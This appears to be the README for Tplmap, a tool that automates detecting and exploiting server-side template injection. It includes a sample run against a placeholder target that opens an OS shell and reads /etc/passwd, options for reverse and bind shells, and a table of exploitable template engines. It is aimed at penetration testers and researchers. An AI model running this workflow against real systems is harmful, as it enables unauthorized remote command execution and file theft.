Tplmap
Tplmap (short for Template Mapper) is a tool that automate the process of detecting and exploiting Server-Side Template Injection vulnerabilities (SSTI). This assists SSTI exploitation to compromise the application and achieve remote command execution on the operating system.
The tool can be used by security researches and penetration testers, to detect and exploit vulnerabilities and study the template injection vulnerability class.
The plugin architecture makes easy to extend the tool and support new template engines and sandbox break-out techniques. Part of the implemented techniques came from public research papers as James Kett's Server-Side Template Injection: RCE For The Modern Web App and other works while others have been discovered to extend this tool exploitation capabilities.
Tplmap is able to detect and achieve arbitrary command execution in several scenarios as injections in code context and blind injections.
Example
$ ./tplmap.py -u 'http://www.target.com/app?id=*'
[+] Tplmap 0.1
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Found placeholder in GET parameter 'id'
[+] Smarty plugin is testing rendering with tag '{*}'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
...
[+] Freemarker plugin is testing blind injection
[+] Velocity plugin is testing rendering with tag '#set($c=*)\n${c}\n'
[+] Jade plugin is testing rendering with tag '\n= *\n'
[+] Jade plugin has confirmed injection with tag '\n= *\n'
[+] Tplmap identified the following injection point:
Engine: Jade
Injection: \n= *\n
Context: text
OS: darwin
Technique: render
Capabilities:
Code evaluation: yes, javascript code
Shell command execution: yes
File write: yes
File read: yes
Bind and reverse shell: yes
[+] Rerun tplmap providing one of the following options:
--os-shell or --os-cmd to execute shell commands via the injection
--upload LOCAL REMOTE to upload files to the server
--download REMOTE LOCAL to download remote files
--bind-shell PORT to bind a shell on a port and connect to it
--reverse-shell HOST PORT to run a shell back to the attacker's HOST PORT
$ ./tplmap.py -u 'http://www.target.com/app?id=*' --os-shell
[+] Run commands on the operating system.
linux $ whoami
www-data
linux $ ls -al /etc/passwd
-rw-r--r-- 1 root wheel 5925 16 Sep 2015 /etc/passwd
linux $
Supported template engines
Template engine | Techniques | Command execution | Code evaluation | File read | File write |
---|---|---|---|---|---|
Mako | render/blind | yes | Python | yes | yes |
Jinja2 | render/blind | yes | Python | yes | yes |
Nunjucks | render/blind | yes | JavaScript | yes | yes |
Jade | render/blind | yes | JavaScript | yes | yes |
JavaScript (generic) | render/blind | yes | JavaScript | yes | yes |
Dust (<= [email protected]) | render/blind | yes | JavaScript | yes | yes |
Smarty (unsecured) | render/blind | yes | PHP | yes | yes |
Freemarker | render/blind | yes | no | yes | yes |
Velocity | render/blind | yes | no | yes | yes |
Twig | render | no | no | no | no |
Smarty (secured) | render | no | no | no | no |
Dust (> [email protected]) | render | no | no | no | no |